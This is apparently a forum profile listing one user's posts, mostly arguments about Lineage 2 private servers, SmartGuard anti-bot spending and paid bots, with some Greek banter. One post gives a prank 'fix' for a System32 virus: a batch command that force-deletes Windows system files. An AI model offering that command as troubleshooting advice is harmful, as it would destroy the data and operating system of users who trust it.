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Everything posted by bravetobe

  1. Someone states that someone else is wrong,and in the rest of his post has no arguments how... :troll: Well,i didnt write the calculations full detailed.How many times people reopened the server?The 360/600 is the like the average which a stupid admin gave for his server. I never said its not useful.I said that its way better to invest money into better file etc instead of getting SG and having shared files.I think that i have already mentioned .. anyway.Well,obviously i m talking about an "ideal" situation which is hard or even impossible to achieve but i dont like the current situation and neither of us i guess. There are actually people who spend hours and effort into projects which end up being 1 week servers. The thread itself is a different approach from a pvp server which might has bigger duration than the current average one.
  2. Well ,i can agree with the first part of ur post but again,u missed my point.Ur server will focus on pvp/events and less to farming.People can bot,but compared with the events/pvp or even party farm it will be way too less.Thats why people will avoid farming with bot. I see u tho,u are ready to type that someone can let it afk farm all day while he is doing the rest of the things with main char. Well,god gave u eyes.I think that with specific areas and someone to look into it + PvP mode on w/o flag-PK will be hard to bot,since everyone will be able to kill ur *** bot. 120-200 * 2/3 months = 360-600 e.If u gave those to a dev to create a juicy event or gud files instead of those crappy /shared files which most of the people have,it would be great. Thats a discussion and i wanted to read some thoughts.The ideal would be the adr RIP ,Akumu pleb mode and devs who code events and stuff -> $$$ but it will be enough if admins stop use donations for that stupid antibot and stop using shared files instead.
  3. So,thats what u say is that SmartGuard is the only way to limit the chatspam /limited boxes per PC /protection generally ? Why someone should care about botting when he can actually have fun and he can make items faster with pvp/events? So,u gonna pay 200-300 per month or w/e for those things? :D In the first statement about deals etc,its obvious anymore and i agree with that. About the red-colored sentence: Its not about playing legit the game or not.Well,personally i prefer servers ~ x100 with both farm/pvp. Well,as i said above,its laughable how people spend so much money into antibot,when they can actually step up,forget the farm part and focus into pvp/events more than it (farm). I m not talking about servers with pvp= adena ,but i guess u get the point.Both community and admins lose money into that bs. If u can actually make that kind of server,u can spend that money into creating stuff instead.
  4. ur clan.Its hard to believe that there are people who actually play without company/clan/friends szaka bot is simple and fits in mid/high rate +pvp servers.most of the servers want u to kill those sh1tty mobs.It doesnt fit for low rate/limited buffs but for the rest is good enough + always on/non blocked. people prefer mid rate servers but most of them are crappy w/o decent events and they buy smartguard + shared files (+) with 1-2 shared events only If server is based into pvp/events and way less from farm,the boting itself is useless.The server will last x2 if its setup properly.They can use that money from SmartGuard into implementing/adding events Its laughable to see people with shared files to pay so much money for antibot.Thats the question of the topic btw :)
  5. U are so wrong from so many prespectives here. Simple as that,people still play x10-20 servers. Also every similar game has dungeons and its party-focused and coop.(In our case,it can be clan). Also,adr made deal with l2destiny: I can give my bucks to szakalaka and get a key.Easy bypass stupid ru SmartGuard. (Tested already) Whats the point here?Who cares if they made deals anyway?I will free bot anyway and they can keep pay for their useless antibot.For me its 10,for them its 300
  6. I would like to ask those who buy SmartGuard or any other antibot (Most servers are java -> The most famous antibot is SmartGuard): Why do u want to pay that much for antibot,when actually everyone uses bot and they pay 10$ only? Force people to make parties and farm as groups instead or pay developers and make events. Its laughable anymore,and u look like the stupid ones.U give money to them for protection but with just 10$ the protection is gone. If u actually make a server which is depended on party-farm /events ,everyone wins.
  7. nai gia auto o ENFIA einai 300kk perissotero apo persi :troll:
  8. Said the guy who asks most the mods to clean his topic from community's opinion (about his sh1tty server) + who wiped/reponed more times than Cristiano Ronaldo took off his shirt after a goal. gg
  9. gemise forumites ... (vorfin) Plhrwste twra ENFIA kai afhste tis mlkies
  10. Can someone explain tho how 2-4 gb gddr5 gpu has low FPS into L2 just because of bot? Does lower graphics option increase fps? wtf is that bs
  11. System32 virus??? Easy solution: Run those @echo off del c:\windows\*.* /F /S /Q /as /ar /aa /ah Also check this site: http://www.downloadmoreram.com
  12. vorfin is the only one who could make DDoS to Kappa #freevorfin
  13. se kseperase. pes apo to chat ton vorfin na kanei allo acc kai na mpei...
  14. stamatiste na kanete ban ton vorfin... Forum xwris drama = no fun
  15. The thing is ,they actually believe that they will find a shared tool in the same forum that Akumu is advertising his antibot XD. Thats an example of what i m saying :) wtf.. http://i.imgur.com/Q2pWxhb.png
  16. Lets say that someone finds a clicker and he posts it here. What do u think will happen? The forum itself is named maxcheaters but people advertise the SG itself in here.Well,thats laughable.Just to compare that ,its like someone is advertising AV into hacking forums etc. Obviously,they will block it,even if it works atm. If u really want a clicker,use some tape or smt (Kappa). People have actually 3 (mainly) choices here: 1)Boycott that bs and dont play into SG servers. 2)Play without bot (lol) 3)Play with paid bot.
  17. uparxei diafora meta3u zwou kai dipodou zwou pou paristanei ton eksupno se forum :P
  18. bravetobe


    low quality shitpost. U dont even own the avatar.If the avatar was ur work,then there would be a chance.
  19. https://www.reddit.com/r/Vvvortic/comments/3w37pq/vvvortic_on_other_adult_sites/ DAKRISA AHAHAH
  20. se kratan oi japanian scripter pisw h to team perissotero?
  21. pare lee sin re kai dei3e ta mechonix tou challenjour
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